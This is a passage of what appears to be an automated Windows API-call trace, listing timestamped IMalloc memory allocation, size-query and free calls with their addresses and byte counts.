(This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.116] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.116] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.116] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.116] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.116] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.117] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.117] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.117] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.117] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.118] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.118] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.118] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.118] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.118] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.118] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.119] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.119] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.119] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.119] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.119] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.119] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.119] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.119] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.120] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.120] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.122] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.122] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.127] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.127] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.133] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.133] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.138] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.138] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.139] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.139] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.141] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.141] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.142] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.142] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.144] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.144] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.148] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.148] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.148] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.148] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.149] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.149] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.149] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.149] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.149] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.149] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.149] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.149] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.149] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.150] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.151] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.151] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.151] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.151] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.151] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.151] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.151] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.151] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.151] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.151] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.152] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.152] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.152] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.152] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.152] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.152] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.152] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.152] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.152] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.152] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.153] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.153] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.153] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.153] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.153] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.153] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.153] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.153] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.153] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.153] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.153] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.153] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.154] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.154] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.154] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.154] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.154] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.154] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.154] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.154] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.155] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.155] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.155] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.155] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.155] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.155] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.155] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.156] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.156] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.156] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.156] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.156] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.156] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.157] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491ad0 [0031.157] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x18 [0031.157] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.157] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.157] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.157] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.157] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.157] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.157] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.157] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.158] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.158] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.158] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.158] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.158] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.158] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.159] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.159] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.159] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.159] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.159] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.159] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.160] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.160] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.160] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.160] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.160] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.160] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.160] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.161] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.161] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.161] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.161] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.161] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ad0 [0031.161] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491ad0) returned 0x10 [0031.161] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.161] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4914b0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491430) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491970) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490ff0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4913b0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491990) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491890) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490f30) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4913d0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4919b0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4918b0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490fd0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490d90) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4913f0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4919d0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb4918d0) [0031.161] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491450) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4919f0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4918f0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491a50) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491950) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491570) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491070) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491050) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491ab0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491770) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4917d0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491830) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491850) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491a10) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4914f0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491530) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491a70) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491610) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491630) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491690) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4916d0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4916f0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491730) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4915f0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491750) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491590) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4915b0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491790) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4917b0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491410) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb4914d0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb491490) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x76db480) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666f90) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666ea0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb80) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7667680) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb40) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x76dba00) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666cf0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666cc0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666c90) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666c60) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666c00) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666ba0) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666b70) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x7666b10) [0031.162] IMalloc:Free (This=0x7fefe015380, pv=0x76db7c0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666ae0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666ab0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666a80) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666a50) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc00) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbbc0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbd40) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76669f0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4e5470) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4e55b0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666990) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666960) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666930) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc40) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc80) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe00) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe40) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666900) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76668d0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76668a0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe80) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbec0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbf00) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbf40) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666840) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666810) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbf80) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dbfc0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc000) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc040) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc080) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc0c0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76667e0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76667b0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc100) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc140) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666780) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666750) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc180) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc1c0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76666f0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76666c0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666690) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc200) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc240) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4e5600) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0xb4e5650) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666660) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666630) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76665d0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76665a0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666570) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666540) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76664e0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc280) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76664b0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666480) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666450) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76663f0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76663c0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc2c0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76dc300) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666390) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666360) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x7666300) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76662d0) [0031.163] IMalloc:Free (This=0x7fefe015380, pv=0x76662a0) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x7666270) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x7666210) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x76661e0) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x76661b0) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x7666180) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x7666150) [0031.164] IMalloc:Free (This=0x7fefe015380, pv=0x76660f0) [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76660f0 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc300 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x34) returned 0x76dc2c0 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666150 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666180 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x76661b0 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76661e0 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666210 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666270 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76662a0 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76662d0 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666300 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666360 [0031.164] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc280 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666390 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76663c0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491490 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914d0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491470 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491410 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917b0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491790 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915b0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491590 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491750 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915f0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491730 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916f0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916d0 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491690 [0031.165] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.166] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491630 [0031.166] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491630) returned 0x10 [0031.168] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5470 [0031.168] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5470) returned 0x48 [0031.172] IMalloc:Alloc 